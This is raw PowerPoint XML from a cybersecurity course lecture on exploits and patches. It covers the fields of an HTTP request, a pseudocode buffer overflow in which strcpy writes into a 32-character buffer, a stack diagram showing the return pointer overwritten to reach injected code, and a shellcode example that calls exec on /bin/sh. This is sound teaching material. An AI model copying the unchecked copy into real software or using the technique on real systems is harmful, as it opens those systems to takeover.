Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://www.websearch.com/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iendly.com/" TargetMode="Externa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friendly.com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CF059-9FC4-4E45-BA28-BEB48EFF1A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CY 2550 Foundations of Cybersecurity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BF3AAA-9F53-441D-8DA2-CEF9EA9405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Exploits and Patches</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1794076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D758B61-EF43-4466-B9AD-44C28DEA9E46}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3493828" y="2083558"/>
            <a:ext cx="0" cy="4640239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ACD054E-657B-4998-AA03-CB9AAF7E2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Request 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B24184-0038-4394-B534-60E0F5CE0B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2191" y="2429301"/>
            <a:ext cx="8397922" cy="42399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GET /index.html HTTP/1.1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Host: www.reddit.com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Connection: keep-alive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Accept: text/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>html,application</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>xhtml+xml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) Chrome/65.0.3325.51 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Accept-Encoding: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>gzip,deflate,sdch</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1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Accept-Language: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>en-US,en;q</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>=0.8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Referer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1600" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>: www.google.com/search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364D5B5-7563-4F9D-8D72-C13A561D6D8B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="2383809"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Method, resource, and version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6F52C95-E8AC-4188-A9CC-A38FCE89AE6C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-1" y="2736376"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Contacted domain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C37AEE1-94CB-49E5-B569-6E95DA5FA7AB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-2" y="3088943"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Connection type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0DEBC3B-0494-444E-A0BC-06344BEE90F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-3" y="3441510"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Accepted file types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E4FF9BF-4EEE-4F91-BD56-10DB70285F27}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-4" y="3794077"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Your browser and OS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5812494-9C39-4B23-AD77-382C00E2875E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-5" y="4146644"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Compressed responses?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CAF1458-FABD-4CAF-904E-A0FCEEF5B727}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="4499211"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Your preferred language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950D18C-371A-4560-82E6-12E97E20B469}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="-6" y="4851779"/>
            <a:ext cx="3484729" cy="3457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056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7584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112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2640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2000" dirty="0"/>
              <a:t>Previous site you were browsing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CE0F1D-100E-49E2-96C1-824866552179}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2329218"/>
            <a:ext cx="6496334" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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AB14AC-FD10-4EFC-A6AF-CB83B213F857}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2673504"/>
            <a:ext cx="6496334" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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013513-1862-4720-8E43-57001A900DA0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="2980257"/>
            <a:ext cx="6496334" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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2A0D402-6E2B-418F-B8FD-6148B88465BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="3366697"/>
            <a:ext cx="8179558" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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D32AC3-104D-4952-ABBA-D821B9D30FD0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="3691967"/>
            <a:ext cx="11900848" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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1381139-CC8D-435D-89CD-7BCC009F026C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141027" y="4037071"/>
            <a:ext cx="7638197" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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8A1BFC4-7496-4DA3-93D2-A7C9910BE324}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145576" y="4396462"/>
            <a:ext cx="7638197" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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68A5AE7-C233-44C3-BA3C-AA0BEABA0F9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="141027" y="4755604"/>
            <a:ext cx="7638197" cy="435094"/>
          </a:xfrm>
          <a:prstGeom prst="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6970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B3FD1-40EA-432C-A286-A9B673140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433196" cy="1325563"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Exploit v1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B7E7A-4158-4A3A-9991-2A74F262C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8113" y="1825625"/>
            <a:ext cx="6384373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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> print(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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> s) {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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// only holds 32 characters, max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string</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> buffer[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>32</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>];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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>strcpy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(buffer, s);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puts(buffer);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18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void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0"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main</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(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integer</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>, 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strings</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin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</a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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for</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> (; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>0</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="7030A0"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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print(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argv</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>argc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>]);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2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="18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CD840B-4B1D-4754-984C-B90D0160516D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9258574" y="365125"/>
            <a:ext cx="1256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Memory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369C03-1A8F-4186-9F55-472D98B5C2F7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8567009" y="826790"/>
            <a:ext cx="0" cy="556305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CDC6264-C836-4FF5-9E0D-22D2C943BE57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11211377" y="826790"/>
            <a:ext cx="0" cy="556305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D67E3C3-5953-4380-8F73-9F71921817FB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="941781" y="1825625"/>
            <a:ext cx="702874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0:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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1: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2: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3:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0" algn="r">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1800" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRP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4: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5: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6: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7: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8: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5A080C8E-FFB2-4DB6-82F5-FE53CA42626B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="250217" y="4159250"/>
            <a:ext cx="980105" cy="86512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F62BF2-F3FF-4D00-BE59-120561E20530}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="1255059"/>
            <a:ext cx="2504140" cy="70522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argv</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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58FE83-725B-4D37-ABD4-021E0287CD35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2035939"/>
            <a:ext cx="2504140" cy="40246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argc</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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88226CC-58DF-4A7F-BA11-36AF21EA00AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3521889"/>
            <a:ext cx="2504140" cy="131088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buffer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8DB585E-751C-4FDD-9A5B-A85F7B19DE3D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7861254" y="2232839"/>
            <a:ext cx="621041" cy="931710"/>
            <a:chOff x="7973123" y="2159723"/>
            <a:chExt cx="621041" cy="1345461"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="11" name="Left Bracket 10">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D8D45CC-5A52-493C-AB99-F7C144AE0D7B}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547880"/>
              <a:ext cx="179292" cy="698382"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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03EADBE-EC70-4A0C-8EB5-E410A92ACFC2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7500447" y="2632399"/>
              <a:ext cx="13454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main()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A001156-8D8D-4DD5-9C0F-2A4C3E5C60C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7877104" y="3110809"/>
            <a:ext cx="605191" cy="1721962"/>
            <a:chOff x="7988973" y="2547879"/>
            <a:chExt cx="605191" cy="1209717"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="27" name="Left Bracket 26">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FADA7FCB-6917-4578-8649-A15085371812}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8414872" y="2547879"/>
              <a:ext cx="179292" cy="1209717"/>
            </a:xfrm>
            <a:prstGeom prst="leftBracket">
              <a:avLst/>
            </a:prstGeom>
            <a:ln w="5715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BBB9F7A-3E34-4926-B407-BB1A4EBDC88D}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm rot="16200000">
              <a:off x="7886815" y="2952683"/>
              <a:ext cx="6044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print()</a:t>
              </a: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7858E695-1AE5-40A2-81C6-A27A3CD39782}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="2514057"/>
            <a:ext cx="2504140" cy="40246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IP = …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FC385A7-7B37-4C33-B4EA-D736063455BD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3061224"/>
            <a:ext cx="2504140" cy="40246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IP = 7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18353E-2F42-4851-8167-95FED5933379}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8623892" y="3521889"/>
            <a:ext cx="2502734" cy="1310882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Malicious code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E3671EE-A5B5-43D3-AAD4-BDA09CDD7538}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8630335" y="3058115"/>
            <a:ext cx="2502734" cy="40557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IP = 952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30939EDD-8E4E-459C-88C8-D62F10A604C1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="1272987"/>
            <a:ext cx="874602" cy="69924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:1000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:996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3E336E1A-0130-4DBF-8E72-72BF8F9F2EF5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2069979"/>
            <a:ext cx="874602" cy="3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:992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8E7C77BC-52DC-4838-ADEB-DC796A5EF88C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="2564309"/>
            <a:ext cx="874602" cy="3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:988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C50640D3-06B7-4EAA-A236-7CB56E8025F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="3074447"/>
            <a:ext cx="874602" cy="3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:984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934E9726-0761-439B-8098-6C16DBEA3C05}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11138105" y="4509952"/>
            <a:ext cx="874602" cy="3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:952</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="184284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44444E-6 L 2.91667E-6 0.1138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0.11389 L 2.91667E-6 -0.38356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88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0.38356 L 2.91667E-6 -0.21574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0.21574 L 2.91667E-6 -0.10208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2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0.10208 L 0.59271 0.03519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35" y="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271 0.03519 L 0.59179 -0.14861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6" grpId="2" animBg="1"/>
      <p:bldP spid="16" grpId="3" animBg="1"/>
      <p:bldP spid="16" grpId="4" animBg="1"/>
      <p:bldP spid="16" grpId="5" animBg="1"/>
      <p:bldP spid="22" grpId="0" animBg="1"/>
      <p:bldP spid="31" grpId="0" animBg="1"/>
      <p:bldP spid="8" grpId="0" animBg="1"/>
      <p:bldP spid="29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834BE-3D1C-4ACB-909A-CB109C3C4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Malicious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EE2E0-6AD7-4059-B2FC-1F114B64F3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The classic attack when exploiting an overflow is to inject a payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Sometimes called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shellcode</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, since often the goal is to obtain a privileged shell </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>But not always!</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>There are tools to help generate shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>pwntools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Example shellcode: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	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	    </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>// execute a shell with the privileges of the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  <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	    // vulnerable program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	    exec(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>“/bin/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>sh</a:t>
            </a:r>
            <a:r>
